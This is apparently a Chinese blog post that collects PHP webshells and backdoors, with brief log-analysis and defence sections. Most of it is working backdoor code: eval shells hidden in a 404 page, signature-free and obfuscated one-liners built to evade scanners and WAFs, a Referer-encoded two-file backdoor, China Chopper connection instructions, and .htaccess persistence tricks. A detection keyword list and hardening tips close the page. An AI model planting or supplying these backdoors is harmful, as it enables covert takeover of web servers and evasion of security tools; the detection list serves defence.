在这里让我们一起学习,一起提高!
0x01 查看访问日志

看是否有文件上传操作(POST方法),

IPREMOVED - - [01/Mar/2013:06:16:48 -0600] "POST/uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
IPREMOVED - - [01/Mar/2013:06:12:58 -0600] "POST/public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"

nginx默认记录的日志格式为:  
Tags: ,
php后门有很多,包子也见多了和玩多了,但是在一次帮助朋友检查服务器的时候,竟然发现这样的恶意代码。

事情是这样的,朋友的网站的利用各种查找后门的工具都没有发现php木马。老是找不到,小黑的伎俩很高级,每次使用完毕总是把后门删掉,但是每次都能继续进来,总是找不到从哪进来的。这个着实让人蛋疼。

后来,终于在日志中发现一丝蛛丝马迹,通过我的分析,我发现一个IP总是很奇怪的POST数据到某个文件。然后一段时间后,此IP就访问一个莫名奇妙文件,名字很显眼明显不是正常系统文件,而是PHP后门。但是很快使用完毕后门就被删除了。
    我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。

利用404页面隐藏PHP小马


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p> </body>
</html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>


404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。

无特征隐藏PHP一句话

<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');


将$_POST['code']的内容赋值给$_SESSION['theCode'],然后执行$_SESSION['theCode'],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。

超级隐蔽的PHP后门


<?php $_GET[a]($_GET[b]);?>


?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waH


执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。

层级请求,编码运行PHP后门

此方法用两个文件实现,文件1

<?php
//1.php  header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}


文件2

<?php
//2.php
header('Content-type:text/html;charset=utf-8');
//要执行的代码
$code = <<<CODE phpinfo();
CODE;
//进行base64编码
$code = base64_encode($code);
//构造referer字符串  
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
CURLOPT_URL => $url,
CURLOPT_HEADER => FALSE,
CURLOPT_RETURNTRANSFER => TRUE,
CURLOPT_REFERER => $referer  );
curl_setopt_array($ch, $options);
echo curl_exec($ch);


通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果,一般waf对referer这些检测要松一点,或者没有检测。用这个思路bypass
waf不错。

PHP后门生成工具weevely

    weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web
页面式的管理,weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通过weevely直接运行。

    weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,被作为检查规则的eval,system等函数都不会直接出现在代码中,从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描,结果显示该文件无任何威胁。

    以上是大概介绍下边是截图,相关使用方法亦家就不在这介绍了,简单的科普一下。
点击在新窗口中浏览此图片

三个变形的一句话PHP木马

第一个:

<?php ($_=@$_GET[2]).@$_($_POST[1])?>


在菜单里写 1.php?2=assert 密码是1。

第二个:

<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>

<?php
${'_'.$_}['_'](${'_'.$_}['__']);
?>


在菜刀里写2.php?_=assert&__=eval($_POST['pass'])
密码是pass。如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。

第三个:


($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');


str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果,让人吐血!

如何应对PHP一句话后门

我们强调几个关键点,看这文章的你相信不是门外汉,我也就不啰嗦了:

1,对PHP程序编写要有安全意识。
2,服务器日志文件要经常看,经常备份。
3,对每个站点进行严格的权限分配。
4,对动态文件及目录经常批量安全审查。
5,学会如何进行手工杀毒《即行为判断查杀》。
6,时刻关注,或渗入活跃的网络安全营地。
7,对服务器环境层级化处理,哪怕一个函数也可做规则。
php后门木马常用的函数大致上可分为四种类型:
  1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open
  2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
  3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
  4. .htaccess: SetHandler, auto_prepend_file, auto_append_file
  1. 执行系统命令:
  system 函数
  //test.php?cmd=ls
  system($_GET[cmd]);
  passthru 函数
  //test.php?cmd=ls
  passthru($_GET[cmd]);
  shell_exec 函数
  //test.php?cmd=ls
  echo shell_exec($_GET[cmd]);
  exec 函数
  //test.php?cmd=ls
  $arr = array();
  exec($_GET[cmd],$arr);
  print_r($arr);
  popen 函数
  //test.php?cmd=ls
  $handle = popen('$_GET[cmd], 'r');
  $read = fread($handle, 2096);
  echo $read;
  pclose($handle);
  proc_open 函数
  //test.php?cmd=ls
  $descriptorspec = array(
  0 => array('pipe', 'r'),
  1 => array('pipe', 'w'),
  2 => array('pipe', 'w'),
  );
  $proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);
  fclose($pipes[0]);
  $output = array();
  while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));
  print_r($output);
  2. 代码执行与加密:
  eval 函数
  //最常见的一句话木马
  eval($_POST[cmd]);
  base64_decode 函数
  //为了免杀及隐藏而加密代码
  //密文: eval($_POST['cmd']);
  eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
  gzinflate 函数
  //为了免杀及隐藏而加密代码
  //密文: eval($_POST['cmd']);
  eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));
  gzuncompress 函数
  //为了免杀及隐藏而加密代码
  //密文: eval($_POST['cmd']);
  eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));
  gzdecode 函数
  //为了免杀及隐藏而加密代码
  //密文: eval($_POST['cmd']);
  eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));
  str_rot13 函数
  //为了免杀及隐藏而加密代码
  //密文: eval($_POST[cmd]);
  eval(str_rot13('riny($_CBFG[pzq]);'));
  assert 函数
  //类似eval函数
  assert($_POST[cmd]);
  call_user_func 函数
  //使用call_user_func调用assert
  call_user_func('assert',$_POST[cmd]);
  call_user_func 函数
  //使用call_user_func调用任意函数
  //test.php?a=assert&cmd=phpinfo()
  call_user_func($_GET[a],$_REQUEST[cmd]);
  组合代码
  //组合方式调用任意函数
  //test.php?a=assert&cmd=phpinfo()
  $_GET[a]($_REQUEST[cmd]);
  3. 文件包含与生成:
  require 函数
  //包含任意文件
  //test.php?file=123.jpg
  require($_GET[file]);
  require_once 函数
  //包含任意文件
  //test.php?file=123.jpg
  require_once($_GET[file]);
  include 函数
  //包含任意文件 www.jb51.net
  //test.php?file=123.jpg
  include($_GET[file]);
  include_once 函数
  //包含任意文件
  //test.php?file=123.jpg
  include_once($_GET[file]);
  file_get_contents 函数
  //读取任意文件
  //test.php?f=config.inc.php
  echo file_get_contents($_GET['f']);
  file_put_contents 函数
  //生成任意内容文件
  //a=test.php&b=
  file_put_contents($_GET[a],$_GET[b]);
  fputs 函数
  //生成任意内容文件
  //a=test.php&b=
  fputs(fopen($_GET[a],"w"),$_GET[b]);
  4. .htaccess:
  SetHandler
  //可将php代码存于非php后缀文件,例: x.jpg
  //将以下代码写入.htaccess中
  //连接x.jpg即可启动后门木马出处www.admin8.us
  
  SetHandler application/x-httpd-php
  
  auto_prepend_file
  //可将php代码存于非php后缀文件,例: 123.gif
  //将以下代码写入.htaccess中, 文件路径必须是绝对路径
  //访问网站上任何php文件都会启动该php后门木马
  //可在不更改站点源代码的情况下记录所有$_REQUEST的值,也可批量挂马
  php_value auto_prepend_file c:/apache2/htdocs/123.gif
  auto_append_file
  //类似auto_prepend_file
  //可将php代码存于非php后缀文件,例: 123.gif
  //将以下代码写入.htaccess中, 文件路径必须是绝对路径
  //访问网站上任何php文件都会启动该php后门木马
  php_value auto_append_file c:/apache2/htdocs/123.gif
防范方法:通过禁止危险函数 php.ini中设置disable_functions详情可以参考下 http://www.jb51.net/article/19292.htm
Tags: ,

php木马检测关键词 不指定

jed , 2010-9-27 06:58 , 服务器技术 , 评论(0) , 阅读(5342) , Via 本站原创
VBScript.Encode
javaScript.Encode
HKEY_LOCAL_MACHINE
shell
提升权限
挂马
上传组件
system32
Serv-U
#l@$
提权
批量替换
清马
OOO000000
eval(gzinflate(
eval(base64_decode(
eval($_
copy($_FILES
move_uploaded_file
execute(request
eval request
execute session(
WScript.Shell
Process.GetProcesses
net user spider spider
GIF89


file_get_contents

<?array_map("ass\x65rt",(array)$_REQUEST['c']);?>




<?php
error_reporting(0);
assert($_REQUEST[chr(86)]);
?>


Tags:
分页: 1/1 第一页 1 最后页 [ 显示模式: 摘要 | 列表 ]